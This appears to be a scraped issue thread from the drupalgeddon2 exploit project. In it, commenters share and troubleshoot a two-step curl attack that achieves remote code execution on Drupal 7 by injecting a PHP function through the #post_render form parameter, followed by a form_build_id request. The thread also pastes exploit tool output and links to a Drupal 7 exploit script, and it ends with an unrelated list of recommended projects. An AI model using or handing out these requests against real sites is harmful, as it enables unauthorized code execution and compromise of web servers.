Comments (8)
Yup, I'm developing a payload for Drupal 7 right now
from drupalgeddon2.
Most probably you already know this one. I tested and it worked for me on 7.5.5.
curl --globoff -X POST --data 'form_id=user_pass&_triggering_element_name=name' 'http://VULNERABLE/user/password?name[%23post_render][0]=PHP_FUNCTION&name[%23markup]=PAYLOAD'
Then extract form_build_id and another request:
curl -X POST --data 'form_build_id=FORM_BUILD_ID' 'http://VULNERABLE/file/ajax/name/%23value/FORM_BUILD_ID'
Original idea: https://twitter.com/b4nhm1
from drupalgeddon2.
It does not work.
At the second request I get this error:
An unrecoverable error occurred. The uploaded file likely exceeded the maximum file size (150 MB) that this server supports.
Tested on 7.54 and 7.57.
from drupalgeddon2.
Works for me on 7.57. Make sure you replace both instances of FORM_BUILD_ID in the second command with the form_build_id from step 1.
from drupalgeddon2.
I did that. What version of PHP are you using ?
from drupalgeddon2.
5.6
from drupalgeddon2.
[+] Target seems to be exploitable! w00hooOO!
Traceback (most recent call last):
3: from drupalgeddon2.rb:118:in <main>' 2: from /usr/lib/ruby/vendor_ruby/json/common.rb:15:in
[]'
1: from /usr/lib/ruby/vendor_ruby/json/common.rb:156:in parse' /usr/lib/ruby/vendor_ruby/json/common.rb:156:in
parse': 765: unexpected token at ' (JSON::ParserError)
from drupalgeddon2.
Exploit for Drupal 7 available on drupalgeddon2.1.rb, enjoy it.
from drupalgeddon2.
Related Issues (20)
- [drupalgeddon2-customizable-beta.rb] 4th argument method - always /user/password HOT 2
- False Positive: can't execute the commands through shell HOT 3
- Strange behavior with Drupal 7.34 HOT 4
- disabled PHP function? HOT 1
- Drupal 7.37 (form_id and form_build_id) HOT 2
- Drupal v8.x detected as v6.x? HOT 1
- Adapt to drupal 6 HOT 1
- Can not detect Drupal version cause it stops iterating when one of the possible URLs gets a 200 response HOT 2
- Feature Request: Control verbosity via Command-Line Argument HOT 2
- Feature Request: Support for Session-Cookie Form and POST-based Authentication HOT 2
- error when running HOT 4
- using the user/login instead user/password? HOT 2
- error HOT 1
- Not working for me :( please help!! HOT 3
- drupalgeddon2 options for insecure https HOT 1
- Target is not exploitabe HOT 1
- Drupal v7.54
- Help in determining injection path
- ModuleNotFoundError: No module named 'colorclass' HOT 1
- Connection reset by peer
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from drupalgeddon2.